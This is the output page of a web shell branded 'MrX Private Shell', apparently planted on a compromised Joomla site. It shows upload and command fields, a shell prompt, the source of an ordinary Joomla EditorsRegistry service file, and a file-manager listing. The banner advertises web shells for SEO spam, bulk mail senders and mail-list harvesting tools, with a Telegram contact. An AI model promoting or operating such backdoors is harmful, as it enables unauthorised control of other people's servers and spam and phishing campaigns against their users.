__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * Joomla! Content Management System
 *
 * @copyright  (C) 2023 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\CMS\Service\Provider;

use Joomla\CMS\Editor\EditorsRegistry as Registry;
use Joomla\CMS\Plugin\PluginHelper;
use Joomla\DI\Container;
use Joomla\DI\ServiceProviderInterface;
use Joomla\Event\DispatcherInterface;

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * Service provider for the application's EditorsRegistry dependency
 *
 * @since  5.0.0
 */
class EditorsRegistry implements ServiceProviderInterface
{
    /**
     * Registers the service provider with a DI container.
     *
     * @param   Container  $container  The DI container.
     *
     * @return  void
     *
     * @since   5.0.0
     */
    public function register(Container $container)
    {
        $container->alias('editorsregistry', Registry::class)
            ->share(
                Registry::class,
                function (Container $container) {
                    $dispatcher = $container->get(DispatcherInterface::class);
                    $registry   = new Registry();
                    $registry->setDispatcher($dispatcher);

                    PluginHelper::importPlugin('editors', null, true, $dispatcher);
                    $registry->initRegistry();

                    return $registry;
                },
                true
            );
    }
}

Filemanager

Name Type Size Permission Actions
Application.php File 9.56 KB 0664
Authentication.php File 4.82 KB 0664
CacheController.php File 1.32 KB 0664
CaptchaRegistry.php File 1.51 KB 0664
Config.php File 1.49 KB 0664
Console.php File 7.38 KB 0664
Database.php File 5.4 KB 0664
Dispatcher.php File 1.3 KB 0664
Document.php File 1.42 KB 0664
EditorsRegistry.php File 1.51 KB 0664
Form.php File 1.37 KB 0664
HTMLRegistry.php File 1.01 KB 0664
Input.php File 1.39 KB 0664
Language.php File 1.27 KB 0664
Logger.php File 1.14 KB 0664
Mailer.php File 1.09 KB 0664
Menu.php File 1.55 KB 0664
Pathway.php File 1.73 KB 0664
Router.php File 2.01 KB 0664
Session.php File 12.66 KB 0664
Toolbar.php File 1.39 KB 0664
User.php File 1.29 KB 0664
WebAssetRegistry.php File 1.47 KB 0664
Filemanager